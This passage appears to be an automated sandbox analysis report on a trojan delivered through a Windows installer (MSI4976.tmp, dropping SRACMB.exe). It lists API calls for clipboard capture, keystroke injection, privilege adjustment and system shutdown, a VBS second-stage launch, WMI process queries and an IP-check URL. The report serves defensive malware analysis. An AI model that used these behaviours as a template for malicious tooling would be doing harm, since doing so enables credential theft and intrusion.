              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00377099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,3_2_00377099
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00377294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_00377294
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_00107294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,8_2_00107294
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00377099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,3_2_00377099
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00364342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,3_2_00364342
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0038F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,3_2_0038F5D0
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_0011F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,8_2_0011F5D0

              System Summary

              barindex
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_003229C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,3_2_003229C2
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_003902AA NtdllDialogWndProc_W,3_2_003902AA
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0038E769 NtdllDialogWndProc_W,CallWindowProcW,3_2_0038E769
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0038EA4E NtdllDialogWndProc_W,3_2_0038EA4E
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0038EAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,3_2_0038EAA6
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0038ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,3_2_0038ECBC
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0033AC99 NtdllDialogWndProc_W,3_2_0033AC99
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0033AD5C NtdllDialogWndProc_W,74BFC8D0,NtdllDialogWndProc_W,3_2_0033AD5C
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0033AFB4 GetParent,NtdllDialogWndProc_W,3_2_0033AFB4
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0038EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,3_2_0038EFA8
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0038F0A1 SendMessageW,NtdllDialogWndProc_W,3_2_0038F0A1
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0038F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,3_2_0038F122
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0038F37C NtdllDialogWndProc_W,3_2_0038F37C
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0038F3AB NtdllDialogWndProc_W,3_2_0038F3AB
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0038F3DA NtdllDialogWndProc_W,3_2_0038F3DA
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0038F425 NtdllDialogWndProc_W,3_2_0038F425
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0038F45A ClientToScreen,NtdllDialogWndProc_W,3_2_0038F45A
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0038F594 GetWindowLongW,NtdllDialogWndProc_W,3_2_0038F594
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0038F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,3_2_0038F5D0
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0033B7F2 NtdllDialogWndProc_W,3_2_0033B7F2
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0033B845 NtdllDialogWndProc_W,3_2_0033B845
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0038FE80 NtdllDialogWndProc_W,3_2_0038FE80
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0038FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,3_2_0038FF04
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0038FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,3_2_0038FF91
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000B29C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,8_2_000B29C2
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_001202AA NtdllDialogWndProc_W,8_2_001202AA
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_0011E769 NtdllDialogWndProc_W,CallWindowProcW,8_2_0011E769
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_0011EA4E NtdllDialogWndProc_W,8_2_0011EA4E
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_0011EAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,8_2_0011EAA6
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000CAC99 NtdllDialogWndProc_W,8_2_000CAC99
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_0011ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,8_2_0011ECBC
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000CAD5C NtdllDialogWndProc_W,74BFC8D0,NtdllDialogWndProc_W,8_2_000CAD5C
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000CAFB4 GetParent,NtdllDialogWndProc_W,8_2_000CAFB4
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_0011EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,8_2_0011EFA8
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_0011F0A1 SendMessageW,NtdllDialogWndProc_W,8_2_0011F0A1
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_0011F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,8_2_0011F122
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_0011F37C NtdllDialogWndProc_W,8_2_0011F37C
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_0011F3AB NtdllDialogWndProc_W,8_2_0011F3AB
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_0011F3DA NtdllDialogWndProc_W,8_2_0011F3DA
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_0011F425 NtdllDialogWndProc_W,8_2_0011F425
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_0011F45A ClientToScreen,NtdllDialogWndProc_W,8_2_0011F45A
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_0011F594 GetWindowLongW,NtdllDialogWndProc_W,8_2_0011F594
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_0011F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,8_2_0011F5D0
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000CB7F2 NtdllDialogWndProc_W,8_2_000CB7F2
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000CB845 NtdllDialogWndProc_W,8_2_000CB845
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_0011FE80 NtdllDialogWndProc_W,8_2_0011FE80
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_0011FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,8_2_0011FF04
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_0011FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,8_2_0011FF91
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0036702F: CreateFileW,DeviceIoControl,CloseHandle,3_2_0036702F
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0035B9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74285590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,3_2_0035B9F1
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_003682D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,3_2_003682D0
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000F82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,8_2_000F82D0
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6e47fe.msiJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{29EF7317-DCA1-4159-97B2-C883AD400AC6}Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4908.tmpJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4976.tmpJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_003830AD3_2_003830AD
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_003336803_2_00333680
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0032DCD03_2_0032DCD0
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0032A0C03_2_0032A0C0
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_003321913_2_00332191
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_003401833_2_00340183
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0036220C3_2_0036220C
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_003285303_2_00328530
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_003266703_2_00326670
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_003406773_2_00340677
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0038A8DC3_2_0038A8DC
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00340A8F3_2_00340A8F
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00326BBC3_2_00326BBC
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0034AC833_2_0034AC83
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0033AD5C3_2_0033AD5C
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00354EBF3_2_00354EBF
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00340EC43_2_00340EC4
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0035113E3_2_0035113E
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_003412F93_2_003412F9
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0035542F3_2_0035542F
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0038F5D03_2_0038F5D0
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0035599F3_2_0035599F
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00325D323_2_00325D32
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0032BDF03_2_0032BDF0
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0034BDF63_2_0034BDF6
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00341E5A3_2_00341E5A
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00329EC93_2_00329EC9
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0034DF693_2_0034DF69
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0036BFB83_2_0036BFB8
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00357FFD3_2_00357FFD
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000BDCD08_2_000BDCD0
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000BA0C08_2_000BA0C0
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000D01838_2_000D0183
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000F220C8_2_000F220C
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000B85308_2_000B8530
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000D06778_2_000D0677
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000B66708_2_000B6670
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_0011A8DC8_2_0011A8DC
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000D0A8F8_2_000D0A8F
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000B6BBC8_2_000B6BBC
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000DAC838_2_000DAC83
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000CAD5C8_2_000CAD5C
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000E4EBF8_2_000E4EBF
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000D0EC48_2_000D0EC4
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_001130AD8_2_001130AD
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000E113E8_2_000E113E
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000D12F98_2_000D12F9
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000E542F8_2_000E542F
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_0011F5D08_2_0011F5D0
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000C36808_2_000C3680
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000E599F8_2_000E599F
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000B5D328_2_000B5D32
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000DBDF68_2_000DBDF6
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000BBDF08_2_000BBDF0
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000D1E5A8_2_000D1E5A
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000DDF698_2_000DDF69
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000FBFB88_2_000FBFB8
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000E7FFD8_2_000E7FFD
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: String function: 000D7750 appears 42 times
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: String function: 000CF885 appears 68 times
              Source: C:\Windows\Installer\MSI4976.tmpCode function: String function: 00347750 appears 42 times
              Source: C:\Windows\Installer\MSI4976.tmpCode function: String function: 0033F885 appears 68 times
              Source: classification engineClassification label: mal100.troj.evad.winMSI@17/14@0/1
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0036D712 GetLastError,FormatMessageW,3_2_0036D712
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0035B8B0 AdjustTokenPrivileges,CloseHandle,3_2_0035B8B0
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0035BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,3_2_0035BEC3
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000EB8B0 AdjustTokenPrivileges,CloseHandle,8_2_000EB8B0
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000EBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,8_2_000EBEC3
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0036EA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,3_2_0036EA85
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00366F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,3_2_00366F5B
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0036EFCD CoInitialize,CoCreateInstance,CoUninitialize,3_2_0036EFCD
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_003231F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,3_2_003231F2
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CML4966.tmpJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DFF2FF7337FADF7859.TMPJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
